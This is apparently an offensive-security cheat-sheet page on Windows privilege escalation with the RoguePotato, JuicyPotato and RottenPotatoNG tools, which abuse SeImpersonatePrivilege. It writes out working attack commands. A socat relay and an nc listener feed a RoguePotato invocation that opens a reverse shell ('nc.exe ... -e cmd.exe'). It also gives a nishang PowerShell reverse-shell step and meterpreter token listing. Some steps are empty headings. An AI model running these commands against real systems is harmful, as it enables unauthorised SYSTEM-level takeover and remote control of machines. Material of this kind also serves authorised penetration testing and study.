search
githubEdit

Juicy Potato, Rotten Potato (NG)

hashtag
Required privs

SeImpersonatePrivilege

(show privs via whoami /priv)

hashtag
RoguePotato

Another Windows Local Privilege Escalation from Service Account to System https://github.com/antonioCoco/RoguePotato

Setup relay (can run e.g. on attacking machine)

socat tcp-listen:135,reuseaddr,fork tcp:<target-ip>:9999

Set up listener

nc -nlvp 1337

Run exploit

RoguePotato.exe -r <relay-ip> -e "nc.exe <local-ip> 1337 -e cmd.exe" -l 9999

hashtag
JuicyPotato

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. Releases · ohpe/juicy-potato · GitHubarrow-up-right -> https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

⚠️ ** Microsoft patched this Vulnerability in Windows Versions 1809/Build 17763** ⚠️ (works until 1803 / 17134)

No more rotten/juicy potato? – Decoder's Blogarrow-up-right

Example

Using nishang reverse shell

-> append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> to the end of the file to automatically execute the shell

Create and upload helper bat file to execute powershell stuff

Start listener

Execute

-> Currently unsure why l is needed

⚠️ Troubleshooting ⚠️

If not working (e.g. error 10038) try another clsid from

hashtag
RottenPotatoNG

New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools.

In msf meterpreter (multi/handler)

``` load incognito list_tokens -u ```

PreviousPowerSploitNextJAWS

Last updated